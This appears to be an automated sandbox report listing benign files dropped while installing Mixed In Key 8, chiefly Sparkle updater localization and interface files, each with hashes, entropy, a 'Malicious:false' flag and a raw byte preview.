                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/.BC.T_4aR1tb
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3190
                                                                                                    Entropy (8bit):5.962955012702519
                                                                                                    Encrypted:false
                                                                                                    MD5:09EC9B35B013F07C4086E2432DBCCE7F
                                                                                                    SHA1:0FDD932C1DD967D03E843AFBCB6EE72FF65467AB
                                                                                                    SHA-256:32DC66D14898CF2225877756CB29B110672FEAA18E31F3E3BB6E93434A9F1C4F
                                                                                                    SHA-512:E20E208EF35222F8FF59AD902A952807D6FF838CD6E234BC26C7E3B9BB90DFED0B1B62E50BD7D6C6092329BE8F6E12037C75944F908C7AC449DDD8438F742701
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @......................................................% $1 @..?.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$. ..................................................................................................% $1 @..........................................;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @.........................."..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @..........................................% $3.@............................"..;".@%d wolnaoed"d= " @%. ........;"..%" @fo% "@= " 1%@$/ % $2"@.;". Aen wevsroi nfo% @sia avlibael"!= " ............% @........................;"..A"n wev reisnoo f@%i serda yoti snatll"!= " ............%
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/.BC.T_WeMYaJ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3096
                                                                                                    Entropy (8bit):5.999412604664841
                                                                                                    Encrypted:false
                                                                                                    MD5:141F43A3CE5CB5DED83C83E0DA541F50
                                                                                                    SHA1:BC62DC9E9EFF199B40FC884B5CC0AF645EBC6753
                                                                                                    SHA-256:6C718D352F88367AA9AFDCD11FE60BC1D0BA89C405EF8F7509B22D8974546DF7
                                                                                                    SHA-512:E1C0FB4948F6DA3BC82EE4B49111339582689FD3DA778BE3623233CC9F83F90BF056954D36394B98BF745E45CF1FAC0BA7F8557A179FCFC4A085B54121EA02B7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @..................................................................1%@$.."..;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =."..% $1 @............................................................................................ .1%@$. ...................................................................................... ;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @..............................;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. ......................................% $3.@..........................;"..%" @odnwoldade " =%" @........"..;".@%o f@% " =%"$1 @ /2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =."................ .@%. ..............;"..A"n wev reis
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/.BC.T_xiSlDN
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):17199
                                                                                                    Entropy (8bit):5.135736976134119
                                                                                                    Encrypted:false
                                                                                                    MD5:F2FB293FFB80AE5B11A177D3FC125BFC
                                                                                                    SHA1:5AEEC2C81C57F32F9587212DA45C44AC8D5CAFEB
                                                                                                    SHA-256:53EEB8124CEB6E7332FBE2486FD7B3DB7DD5E68635E7354FF50CE7680372017D
                                                                                                    SHA-512:563BA088F438CAE901C9A46B447A169697EFEB03C552AEEE1D2B47A0FCFB6A32C7B57E6A6D31FC5401273F43251B6DD497108DFDB9302D37CF38B65B4257058E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/SUStatus.nib</key>...<data>...sYsx+yJdk7U5jlaT5UjkYAO2vYY=...</data>...<key>Resources/Sparkle.icns</key>...<data>...RAPi1GDm7RjA+JlOSVD1eYK+1VA=...</data>...<key>Resources/ar.lproj/Sparkle.strings</key>...<dict>....<key>hash</key>....<data>....3lN5msMrnMK9Fubf02YF5yyKp7U=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/ca.lproj/Sparkle.strings</key>...<dict>....<key>hash</key>....<data>....6/s1eEjWZXuL2nONj/e+GBQpgwM=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/cs.lproj/Sparkle.strings</key>...<dict>....<key>hash</key>....<data>....7G6Wu81r8iXwJthLcpfOsWytHBY=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/cy.lproj/Sparkle.strings</key>...<dict>....<key>hash</key>....<data>....KN8ItOjhEffwLKA/MVfiNyq
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_XMiW2e
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11231
                                                                                                    Entropy (8bit):6.727588278191743
                                                                                                    Encrypted:false
                                                                                                    MD5:09A84F2E53586C216770298F304F3413
                                                                                                    SHA1:C3E4036BEE69C6A177782E7D898BD134C76D1C2A
                                                                                                    SHA-256:C1E345A144AA46FDEEB9713E98C642A24102E5ED9C183AFE40004B7C894C905A
                                                                                                    SHA-512:215E71D2E5E0407CD92D4608040EC0CC13E6D3F676B05BEBEC8FD1E3C0989F200130D9C0661E364C885A1AF2E7A64CAE46E96F988475D6358B2B1159BF4D88D1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............i.jX$versionX$objectsY$archiverT$top...............#.$.*...2.;.C.].e.h.l.x.y.z.{.|.}.~.........................................................................&.'.0.1.5.6.;.<.A.F.G.I.K.L.Q.n.o.p.q.z.........................................................................5.m.....N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.c.fU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....q.o.l...........p.. ...!."[NSClassName...._..SUPasswordPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9.....7.F.g.j....<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.P.T.X.Y.Z.[.YYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSvFlagsZNSEditable_..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_YdfVE0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18413
                                                                                                    Entropy (8bit):6.841024145237134
                                                                                                    Encrypted:false
                                                                                                    MD5:67FAA715745F035BED3EF9BE75BA55BB
                                                                                                    SHA1:C92E59C780926374E7B20E7AE8CE4092938A9656
                                                                                                    SHA-256:946E3A9B7B6D35F3F9DC5AE7F587533F0BA832F5612A4D9CB25D58AB8B8FF369
                                                                                                    SHA-512:2F251DDEC032DB13145F0AC0913208A55EFFD76A11FF197E1186901DBDE847191392B8C5D8C53C8DA524EDCD77C0B998BD52F5BF73814387A596B2370290774B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.D.L.`.i.j.z.{.......................................................................6.<.L.P.y.z...........................................................................$.%.*.,./.8.9.A.B.C.D.G.H.M.m.n.o.p.z.....................................................................................".(.).*.-.0.3.4.6.7.8.9.:.=.>.C.D.H.M.N.S.T.`.a.b.c.j.k.l.o.s.z...............................................w._.......................................".D.v.^...d............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObj
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_kMRPSO
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):7338
                                                                                                    Entropy (8bit):4.058797302856809
                                                                                                    Encrypted:false
                                                                                                    MD5:5B9906E0639B83DC409E4D9D16074085
                                                                                                    SHA1:74CDFC1DAFDC67083C4A5B3DC561D7834FA82AF4
                                                                                                    SHA-256:0713432356335E0445C90539D327AAD2D9F7C4BCF23194F92284CF5A0C2E34F8
                                                                                                    SHA-512:D1B93FEAE9A9AB5FB67228D0645B2D91018B7822362DD004519156248C7296224E6E8C42D3EE564AF18A472D906CBE1B7EE0F5528E59115EA10B00FEB8CE58CD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".*.E. .*.F.2.J.D. .%.1.$.@. .%.2.$.@. .H.G.H. .,.'.G.2. .D.D.'.3.*.../.'.E... .G.D. .*.1.:.(. .(.*.+.(.J.*. .'.D.*.-./.J.+. .H.%.9.'./.). .*.4.:.J.D. .%.1.$.@. .'.D.".F...".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".D.'. .J.E.C.F. .*.-./.J.+. .%.1.$.@. .%.0.'. .4.O.:.Q.D. .E.F. .H.-./.). .*...2.J.F. .D.D.B.1.'.!.). .A.B.7. .C.5.H.1.). .B.1.5. .#.H. .B.'.1.&. .'.D.#.B.1.'.5. .'.D.6.H.&.J.)... .'.F.B.D. .%.1.$.@. .%.D.I. .E.,.D./. .'.D.*.7.(.J.B.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_uYtdSt
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15857
                                                                                                    Entropy (8bit):6.829276643295605
                                                                                                    Encrypted:false
                                                                                                    MD5:9B72FC2BE98D0F6C0B48D2D1BE7B5C9B
                                                                                                    SHA1:917F368339286761A6E08EEAE1C73FB26158AB3A
                                                                                                    SHA-256:4AFF2DEB1FFCF13E054AE3F058F8C0F140D353CA1ABC9FD0D224AB409AAD2432
                                                                                                    SHA-512:4F5CF726BDEB3C58E1388D4B101430B5D48D090B75F697FC7F27C16F156C4C722AC2EDEF8CBEF42CD14DC01EE0B61626767362D7F94D7F863640595AD1A0A7A8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00................ X$versionX$objectsY$archiverT$top................#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$.*.+.,./.2.5.>.?.G.K.L.U.V.^._.c.x.|...........................................................................................................#.$.%.+.3.4.5.;.C.D.E.K.R.S.T.[.\.].w.z.{.}.....s.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_yH8ucj
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12199
                                                                                                    Entropy (8bit):6.756128403184578
                                                                                                    Encrypted:false
                                                                                                    MD5:EBDBD654548AD0B72E7ED3F8424BF9BD
                                                                                                    SHA1:AE8E7CD6581FE71EF16F4C815FBE6789F6BF7ECB
                                                                                                    SHA-256:77FA6E398B746F9069B017CEB8ABD089927738949D70C477AE13D37F1CC12EA4
                                                                                                    SHA-512:1F76FF88F584961F597F2394DB60F9F4AE6025F653E0DBAA76641036AAD43958175B32291A82013807FD751F7A83104381437AC740569294DF83AA078B64F415
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_5LUenu
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12192
                                                                                                    Entropy (8bit):6.719748502159661
                                                                                                    Encrypted:false
                                                                                                    MD5:7B75B6D9C1CCCBF63981460B9AF6CD66
                                                                                                    SHA1:BEB423531C61DC3A92F37CDFE790A7C9779B6435
                                                                                                    SHA-256:D3563E0CD0B1ED4A1D3122B4BA8D5D5E067D4316FAB7BA410C7352B3202AB9A9
                                                                                                    SHA-512:5C15BD8880D882D12A80A51A779DC1BAD34126C6F5FAFADCDCC13344680DD79369245F63737A0E96C8925006530455485013B95376E42626778360998D27152C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_UDU7Hf
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):6692
                                                                                                    Entropy (8bit):3.5708187390906523
                                                                                                    Encrypted:false
                                                                                                    MD5:CA263DA5A183E7C3CDE5B4AD2EDDC60B
                                                                                                    SHA1:1655DEB4BC11D23E7FD68766D036FE1F609CB538
                                                                                                    SHA-256:6097D225090B8C7AFE5108437629B983EDD2B0CA56BB80B90927724DCDDBFE4D
                                                                                                    SHA-512:83941EABBD609F250A2FF3FA31F0E428EBC4D83697DDBD54C159338E5AFA509287A6654DD631A396944FFCDCB5F9FFDDC91877A40756DCFBF59B86A7687C9659
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .b.y.l. .i.n.s.t.a.l.o.v...n. .a...j.e. .p.Y.i.p.r.a.v.e.n. .k...p.o.u.~.i.t... .p.o. .p.Y...a.t...m. .s.p.u.a.t...n..... .P.Y.e.j.e.t.e. .s.i. .a.p.l.i.k.a.c.i. .%.1.$.@. .n.y.n... .n.a.i.n.s.t.a.l.o.v.a.t. .a...z.n.o.v.u. .s.p.u.s.t.i.t.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".A.p.l.i.k.a.c.e. .%.1.$.@. .n.e.m.o.~.e. .b...t. .a.k.t.u.a.l.i.z.o.v...n.a.,. .p.r.o.t.o.~.e. .j.e. .s.p.u.a.t...n.a. .z. .n.e.z.a.p.i.s.o.v.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_VztrS8
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18531
                                                                                                    Entropy (8bit):6.795186436798338
                                                                                                    Encrypted:false
                                                                                                    MD5:6B5D21F527D33BB47C4F6EAAA8171AD1
                                                                                                    SHA1:ADE56798A94093D2BE1DB77A7A86A1CE13F1B345
                                                                                                    SHA-256:569973B6720FB0681129281168BB8FEFA2027A61D16AAB80C033157D888E5863
                                                                                                    SHA-512:A2D949A31CB11BAA99BE9CF215E5B8E31A7CE98DE8F9558A9FE616B96D4487F08C5BB36B61B3B282AE025E323B7EBC48E9C2F0037635E0E6AC661596ADAA1CFF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_pRrWQ5
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15732
                                                                                                    Entropy (8bit):6.801968495801679
                                                                                                    Encrypted:false
                                                                                                    MD5:5F0F63BDCF210C55B03D4706E1E6EC04
                                                                                                    SHA1:8EE78B8AB2E1DE35E960880C4A9A2C03067F5ED8
                                                                                                    SHA-256:4CA69BA1F9023769B898A96DFE800D2DE1F83B7074502F4E41FC83B06C596A2A
                                                                                                    SHA-512:465D72F07142E2A95BB577AECF5B244D4660D93E7EAFA3BC5CEF8ED4E0C7B1AD5B6820DD23A441C72E9DD3FB7A30FB2E18C1ABF9D1968AA9BE3EE202D92461D9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].j.k.l.m.`.o.s.w.z.{...................................................................".-.0.1.9.:.;.G.J.K.S.T.U.j.n.r.s.u.v.w.}.......................................................................................................$.%.&.,.4.5.6.<.C.D.E.L.M.N.h.k.l.n.....e._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_98r7TK
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11180
                                                                                                    Entropy (8bit):6.725807843539839
                                                                                                    Encrypted:false
                                                                                                    MD5:53F130FD5A30B191D5FBF9A6367FA439
                                                                                                    SHA1:AA3E2548480EC8C68169EFFA07A9EB7CCF11B990
                                                                                                    SHA-256:8D8ACC5B88CD4AA6818E612A253BA76E7D5797E9C38BC9B1566C797B4FB1DB9D
                                                                                                    SHA-512:18901D5C8D6D9656BC72C451B2677652EED91DAE8687EF43B5D6A96814C7962840FDADA1EB54D3AE1B3F1777A752165C0DAB4D51A44CB0FA296682E80183BE2F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............h.iX$versionX$objectsY$archiverT$top...............#.$.*...2.;.C.].e.h.l.x.y.z.{.|.}.~.........................................................................&.'.0.1.5.6.;.<.A.F.G.I.K.L.Q.n.o.p.q.z.........................................................................4.m.....M.N...O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.b.eU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....q.o.l...........p.. ...!."[NSClassName...._..SUPasswordPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9.....7.F.g.j....<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.P.T.X.Y.Z.[.YYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSvFlagsZNSEditable_..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_FdtPvU
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15759
                                                                                                    Entropy (8bit):6.805944042471916
                                                                                                    Encrypted:false
                                                                                                    MD5:67C0B91D3248F0FB5D290C5AEA274773
                                                                                                    SHA1:E70B103D320E6419128D37B929CED3185A8CB155
